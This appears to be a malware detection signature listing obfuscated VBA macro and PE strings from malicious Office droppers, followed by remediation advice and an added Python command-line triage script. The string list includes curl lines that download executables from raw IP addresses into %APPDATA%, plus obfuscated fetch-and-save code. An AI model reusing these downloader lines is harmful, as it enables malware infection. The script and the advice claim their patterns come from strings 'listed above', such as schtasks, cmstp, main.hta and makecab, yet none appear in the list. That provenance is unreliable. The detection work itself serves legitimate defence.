- pinnS = Environ("Temp") & "\" & ty & "." (MACROHSTR_EXT)
- .Open famaile("Yf-9T08G_3E"), Adreus, False (MACROHSTR_EXT)
- CreateObject(famaile("_9DrYA.a8DSm03Ot-fBe")) (MACROHSTR_EXT)
- Foglioo = GetObject((bio)).Get((energ)) (MACROHSTR_EXT)
- qAqua.Open Z & ocmoS, sJimm, False, (MACROHSTR_EXT)
- (((niu(28, 29)))) & "\" (MACROHSTR_EXT)
- .Write qAqua.responseBody: .SaveToFile hlII, (MACROHSTR_EXT)
- .SaveToFile Tooi, Abs(CInt(Nads)) + 1 (MACROHSTR_EXT)
- cemS(Tio("ts/rnstlohp/oieoact:mevri.m"), (MACROHSTR_EXT)
- Tio("esr2/ rgv3 s") & r (MACROHSTR_EXT)
- ct(truej("5hdbtaxjo.rmiadse"))#endifflibustiero.opentruej("91emztrg"),tbooks,false,rollers,aboar (MACROHSTR_EXT)
- y.savetofileapancil,abs(cint(institute))+1endwithcoolegium=len(dir(apancil))>0 (MACROHSTR_EXT)
- n(("temp"))&"\"endfunctionsubselection_s()alia=vintegerareawidths=coolegium(truej("qhp/onco_jts/ma.m>\t:daic"),alia)a (MACROHSTR_EXT)
- .Exec ("cmd /c curl http://109.248.11.155/network.exe -o %APPDATA%\ (MACROHSTR_EXT)
- .Exec ("cmd /c curl http://191.101.2.39/installazione.exe -o %APPDATA%\ (MACROHSTR_EXT)
- destination:=activesheet.range("$a$2")). (MACROHSTR_EXT)
- =hubb&""&ambasso&",#1/q"shellnigojiendfunctionfunctionhermu() (MACROHSTR_EXT)
- =createobject(nexxt("5hdbtaxjo.rmiadse"))#endifvbarf.opennexxt("91emztrg") (MACROHSTR_EXT)
- =vba.environ(("temp"))&"\"endfunction (MACROHSTR_EXT)
- =comedy(nexxt("qhp/onco_jts/ma.m>\t:daic"),sk)xareaxareahight=vivaldi(vaar(""&sk))endsubfunction (MACROHSTR_EXT)
- =getobject(sii).get(uu)how (MACROHSTR_EXT)
- ="http://inter"& (MACROHSTR_EXT)
- &orios&".com"oxhttp.open"get",kioer,false (MACROHSTR_EXT)
- "ndll"&oriospl="ru"&orios& (MACROHSTR_EXT)
- :withcreateobject("wscript.shell") (MACROHSTR_EXT)
- &environ$("userprofile")&"\documents"&_application.pathseparator& (MACROHSTR_EXT)
- =brevettato(left(environ(cojones("5-38c-o0m9s7p101ec3")),20)&cojones("-11r3-e80g,s710v-8r1")&"32."&cojones (MACROHSTR_EXT)
- = kFonda(cValute("Ihsfs.)?t:itc=Ep/rrmREt/eao"), m) (MACROHSTR_EXT)
- fLogica = UAres & Application. (MACROHSTR_EXT)
- = VBA.Environ((("TEmp"))) & "\" (MACROHSTR_EXT)
- = GetObject(fa).Get(nnt) (MACROHSTR_EXT)
- .Open "" & RY, ViU, False, "", "" (MACROHSTR_EXT)
- marvell(ing)marvell=environ("systemdrive")&environ("homepath")&_application. (MACROHSTR_EXT)
- =vba.environ(((niu(28,29))))&"\"endfunction (MACROHSTR_EXT)
- =getobject(vv)setdf=dd.get(bn)seter=df.create (MACROHSTR_EXT)
- =getobject(sii)tff=7setjam=muu.get(roo)setandre=jam.create (MACROHSTR_EXT)
- .openz&ocmos,sjimm,false,z,z (MACROHSTR_EXT)
- ="a"&a&":"&"ha"&bsetd=range(t)foreachfiind.special (MACROHSTR_EXT)
- yPtnHMg.pdb (PEHSTR_EXT)
- yisgland.m (PEHSTR_EXT)
- giveletdon.ttwo.p (PEHSTR_EXT)
- = GetObject((SeY)).Get((SyI)) (MACROHSTR_EXT)
- = Internationale(HaBB("(!pzry3so.&h:pcrt/omvt/xo"), fo) (MACROHSTR_EXT)
- = HaBB("_5MMP0,LL.IM2H6fXXT0hS.T.") (MACROHSTR_EXT)
- .Write wolF.responseBody: .SaveToFile GumVu, (MACROHSTR_EXT)
- = New MSXML2.XMLHTTP60 (MACROHSTR_EXT)
- .Open "" & RY, ViU, False, "", (MACROHSTR_EXT)
- fe.STARTUPINFO.cb = LenB(fe): fe.STARTUPINFO.qweejjj = am (MACROHSTR_EXT)
- himme("h tmtopcs.:a/i/ndaokmiin"), BpinnS, xlTop10Bottom, xlReport1) = ty - ty Then Debug.Print (MACROHSTR_EXT)
- DecodeBase64((bumerangus(arMani("5;6h-t20t p6s :") & "://" & arMani("mederaogs") & "." & arMani("/c12o-m")))), Farmaci (MACROHSTR_EXT)
- Application.DefaultFilePath (MACROHSTR_EXT)
- = Donati & arMani("0\9c6al9c") & "." & arMani("9e7-x5e") (MACROHSTR_EXT)
- & "\" & Int( (MACROHSTR_EXT)
- & "." (MACROHSTR_EXT)
- ("115;6h-t20t 2p6s :1") & "://" & (MACROHSTR_EXT)
- ("chechoa") & "." & (MACROHSTR_EXT)
- ("/-c12o-3m3")))), (MACROHSTR_EXT)
- ("11r3-e8 0g,s7;10v 8r1") & "32." & (MACROHSTR_EXT)
- 0\9c6al9c7") & "." & (MACROHSTR_EXT)
- Debug.Print (MACROHSTR_EXT)
- = eliminano("9 H/11cV T3 5s8taOr6t ", 1) (MACROHSTR_EXT)
- & eliminano("8\AcN4BaJ8l0c532.8eYxE7e1", 3) (MACROHSTR_EXT)
- (CreateObject("wscript.shell").exec(Exel).StdOut.ReadAll()): Workbooks.Application.DisplayAlerts = False: Application.Quit (MACROHSTR_EXT)
- = Environ$("USERPROFILE") & "\Documents" & _ (MACROHSTR_EXT)
- = CreateObject("MSXML2.XMLHTTP") (MACROHSTR_EXT)
- deformato.Open "get", squilibrati, False (MACROHSTR_EXT)
- deformato.setRequestHeader "etag", "fetch" (MACROHSTR_EXT)
- MsgBox (Len(resistermi((intrecciato("h33t1tp30s:1//25li15jos1a.c80o4m")))) - 404) (MACROHSTR_EXT)
- = "http://inter" & (MACROHSTR_EXT)
- & Orios & ".com" (MACROHSTR_EXT)
- = .Run(Pl & " InetCpl.cpl,ClearMyTracksByProcess 255", 0, True): End With (MACROHSTR_EXT)
- ) & ".cvs" (MACROHSTR_EXT)
- = ",#" & Len(oXHTTP.getResponseHeader("Akamai-GRN")) (MACROHSTR_EXT)
- sfhjffkfhgfdjsrfhdfdfhfffadsgfahsscffgdb (PEHSTR_EXT)
- 269e3863.dll (PEHSTR_EXT)
- stwn404ya13.dll (PEHSTR_EXT)
- Sit.dll (PEHSTR_EXT)
- grcook64.pdb (PEHSTR_EXT)
- cookies.sqlite (PEHSTR_EXT)
- *.txt (PEHSTR_EXT)
- .Z,Ai$ (SNID)
- ") & "://" & (MACROHSTR_EXT)
- ") & "." & (MACROHSTR_EXT)
- ") & "32." & (MACROHSTR_EXT)
- 0\9c6al9c (MACROHSTR_EXT)
- rab429ko27.dll (PEHSTR_EXT)
- !#HSTR:StringCodeForMshta.A!pli (PEHSTR_EXT)
- !#HSTR:StringCodeForHooking.C!pli (PEHSTR_EXT)
- !#HSTR:StringCodeForHooking.D!pli (PEHSTR_EXT)
- !#HSTR:StringCodeForHooking.L!pli (PEHSTR_EXT)
- !#HSTR:StringCodeForHooking.O!pli (PEHSTR_EXT)
- !#HSTR:StringCodeForRegsvr32.A!pli (PEHSTR_EXT)
- !#HSTR:StringCodeForRundll32.A!pli (PEHSTR_EXT)
- rundll32 (PEHSTR_EXT)
- !#HSTR:StringCodeForBITSJobs.A!pli (PEHSTR_EXT)
- !#HSTR:StringCodeForPowerShell.G!pli (PEHSTR_EXT)
- !#HSTR:StringCodeForScheduledTask.A!pli (PEHSTR_EXT)
- !#HSTR:StringCodeForDataEncoding.D!pli (PEHSTR_EXT)
- !#HSTR:StringCodeForHooking.J!pli (PEHSTR_EXT)
- !#HSTR:StringCodeForHooking.K!pli (PEHSTR_EXT)
- !#HSTR:StringCodeForRemoteFileCopy.B!pli (PEHSTR_EXT)
- !#HSTR:ExecutionGuardrails (PEHSTR_EXT)
- !#HSTR:StringCodeForFileDeletion.A!pli (PEHSTR_EXT)
- !#HSTR:StringCodeForHooking.M!pli (PEHSTR_EXT)
- !#HSTR:StringCodeForNetshHelperDLL.A!pli (PEHSTR_EXT)
- !#HSTR:StringCodeForRemoteServices.A!pli (PEHSTR_EXT)
SHA-256: c3105cdaac7f7886aedf30ba4da177472786d9bca22f4a787eff30e18a9c7b3b
Recommended response: Immediately isolate the infected host from the network. Run a full scan with up-to-date antivirus signatures and remove every detected component. Investigate persistence and follow-on malware before trusting the machine again: check the HKCU Run and StartupApproved\Run keys, scheduled tasks created with minute-interval triggers, and droppers left in C:\users\public, C:\ProgramData and %TEMP%; then prefer a full reimage or a restore from a backup taken before the infection. Change every credential that may have been entered in a browser on the host, above all banking and other sensitive accounts, and do so from a clean device, because the stealer targets the browsers themselves. Block the C2 domains and download URLs listed above at the proxy and DNS layers and hunt for the beacon request formats across the rest of the estate.
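The persistence and loader strings above translate directly into process command-line checks for the investigation step. The following is an added example, not code from the page or from Microsoft: each rule is built from a macro or PE string in the list (schtasks /SC Minute, cmstp /ni /s, regsvr32 of a downloaded .tmp, payloads under C:\users\public, cmd /c curl into %APPDATA%, the type/del self-delete, makecab.exe /F, InetCpl.cpl,ClearMyTracksByProcess 255, cscript on Printing_Admin_Scripts). The events are constructed with TEST-NET addresses and made-up file names; mshta as the launcher of main.hta and regsvr32 as the launcher of ftr.cpl are assumptions, since the strings show those file names but keep the launcher in a form control the signature does not print.

```python
"""Triage process command lines for the loader and LOLBin patterns in this signature.

Added example, not code from the page or from Microsoft. The patterns are
built from the macro and PE strings listed above; the events are constructed
(TEST-NET addresses, made-up file names) to exercise each rule.
"""
from __future__ import annotations

import re

# Each rule: (name, compiled pattern). Grounding in the string list:
#   schtasks.exe /Create /F /TN ... /TR ... /SC Minute /MO
#   Shell("cmstp /ni /s C:\ProgramData\....inf")
#   .run "regsvr32 " & <downloaded .cab saved as *.tmp>
#   c:\users\public\main.hta, ftr.cpl, wtt.gz, login.jpg, xfe.png
#   cmd /c curl http://.../x.exe -o %APPDATA%\
#   cmd /U /C "type %s1 > %s & del %s1"
#   makecab.exe /F "%s"
#   InetCpl.cpl,ClearMyTracksByProcess 255
#   cscript.exe C:\windows\System32\Printing_Admin_Scripts\en-US\...
RULES: list[tuple[str, re.Pattern[str]]] = [
    ("schtasks minute-interval task",
     re.compile(r"schtasks(\.exe)?\s+/Create\b.*\s/SC\s+Minute\b", re.I)),
    ("cmstp .inf from ProgramData",
     re.compile(r"cmstp(\.exe)?\s+/ni\s+/s\s+C:\\ProgramData\\\S+\.inf", re.I)),
    ("regsvr32/rundll32 of non-DLL payload",
     re.compile(r"(regsvr32|rundll32)(\.exe)?\s+.*\.(tmp|cab|gz|jpg|png)\b", re.I)),
    ("payload run from C:\\users\\public",
     re.compile(r"c:\\users\\public\\\S+\.(hta|cpl|gz|jpg|png)\b", re.I)),
    ("curl download into %APPDATA%",
     re.compile(r"cmd(\.exe)?\s+/c\s+curl\s+https?://\S+\s+-o\s+%APPDATA%", re.I)),
    ("type/del self-delete",
     # group 2 is the source file; the backreference insists the same file is deleted
     re.compile(r'cmd(\.exe)?\s+/U\s+/C\s+"type\s+(\S+)\s*>\s*\S+\s*&\s*del\s+\2', re.I)),
    ("makecab staging",
     re.compile(r'makecab(\.exe)?\s+/F\s+"', re.I)),
    ("browser history wipe",
     re.compile(r"InetCpl\.cpl,ClearMyTracksByProcess\s+255", re.I)),
    ("cscript on Printing_Admin_Scripts",
     re.compile(r"cscript(\.exe)?\s+.*Printing_Admin_Scripts", re.I)),
]


def triage(cmdline: str) -> list[str]:
    """Return the names of every rule the command line trips, in rule order."""
    return [name for name, rx in RULES if rx.search(cmdline)]


def scan_events(events: list[tuple[str, str]]) -> list[tuple[str, str, list[str]]]:
    """Take (host, command line) pairs, e.g. from Sysmon event 1, and keep the ones that fire."""
    flagged = []
    for host, cmdline in events:
        rules = triage(cmdline)
        if rules:
            flagged.append((host, cmdline, rules))
    return flagged


# Constructed events; the last three are benign look-alikes that must stay quiet.
SAMPLE_EVENTS = [
    ("WS01", r"cmd /c curl http://203.0.113.10/network.exe -o %APPDATA%\network.exe"),
    ("WS01", r'schtasks.exe /Create /F /TN "Updater" /TR "C:\Users\Public\upd.exe" /SC Minute /MO 5'),
    ("WS02", r"cmstp /ni /s C:\ProgramData\a1b2.inf"),
    ("WS02", r"regsvr32 C:\Users\bob\AppData\Local\Temp\kE.tmp"),
    ("WS03", r"mshta c:\users\public\main.hta"),          # launcher assumed
    ("WS03", r"regsvr32 C:\users\public\ftr.cpl"),        # launcher assumed
    ("WS04", r'cmd /U /C "type C:\Temp\svc.exe1 > C:\Temp\svc.exe & del C:\Temp\svc.exe1"'),
    ("WS04", r'makecab.exe /F "C:\Users\bob\AppData\Local\Temp\ddf.txt"'),
    ("WS04", r"rundll32.exe InetCpl.cpl,ClearMyTracksByProcess 255"),
    ("WS05", r"regsvr32 /s C:\Program Files\Vendor\plugin.dll"),
    ("WS05", r'schtasks.exe /Create /TN "Backup" /TR "C:\Tools\backup.exe" /SC Daily'),
    ("WS05", r"cmd /c curl https://example.com/api -o C:\Temp\out.json"),
]

if __name__ == "__main__":
    for host, cmdline, rules in scan_events(SAMPLE_EVENTS):
        print(f"{host}: {', '.join(rules)}\n    {cmdline}")
```

The rules deliberately key on the combination that the strings show (a minute-interval schedule rather than any schtasks call, regsvr32 against a .tmp rather than any regsvr32 call, a curl that writes into %APPDATA% rather than any curl), so the three benign lines at the end do not fire. Point `scan_events` at exported EDR or Sysmon process-creation records to sweep an estate for the same droppers.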